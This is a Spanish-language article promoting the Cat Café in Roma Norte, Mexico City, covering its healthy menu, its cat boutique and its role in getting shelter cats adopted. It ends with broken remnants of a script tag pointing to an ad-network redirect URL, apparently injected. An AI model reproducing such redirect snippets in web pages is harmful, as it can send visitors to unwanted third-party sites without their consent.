¿Amante de los gatos?  Ven a Cat Café

Un lugar para comer tranquilamente en la compañía de un felino.

Hablando de lugares que rompan con la rutina y sean considerados “raros”, encontramos el Cat Café que está ubicado en Tabasco 337, Roma Nte.

Este lugar está catalogado como el primer Cat Café  de Latinoamérica, en donde el cliente puede pasar el rato tomando un café e ingiriendo alimentos saludables con la compañía de felinos, que están totalmente sanos, esterilizados y la mayoría tienen la posibilidad de ser adoptados.

Es un lugar muy tranquilo, no para todos los gustos, debido a que no todos somos amantes de los gatos. Cat Café tiene comida saludable preparada con ingredientes de alta  calidad y orgánicos.  Entre la comida se puede ordenar  paninis, pastas, ensaladas y postres, además de las bebidas que pueden ser calientes, frías o smoothies.

La gatería tiene una boutique para los felinos, esta tienda cuenta con más de 200 productos especiales para gatos, un lugar acogedor donde puedes comprar algo para tu mascota o para el gato que quieras adoptar. En el Cat café los clientes tienen la oportunidad de relacionarse con estos felinos y encariñarse para que se animen a adoptar uno.

El propósito de este lugar es que las personas conozcan a los gatos y pasen un momento agradable en compañía de estos animales para que les puedan encontrar un hogar. La gatería tiene en mente encontrar un lugar para todos los gatos que vienen de refugios, ellos tienen algunos felinos vagando por el café para que la gente los pueda ver y los pueda colocar en algún hogar. Aclarando que el Cat café no es un refugio, solo un intermediario para negociar la adopción de los pequeños felinos, convirtiéndose en un lugar responsable por ayudar a esta causa.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

< type="text/java">

Etiquetas:|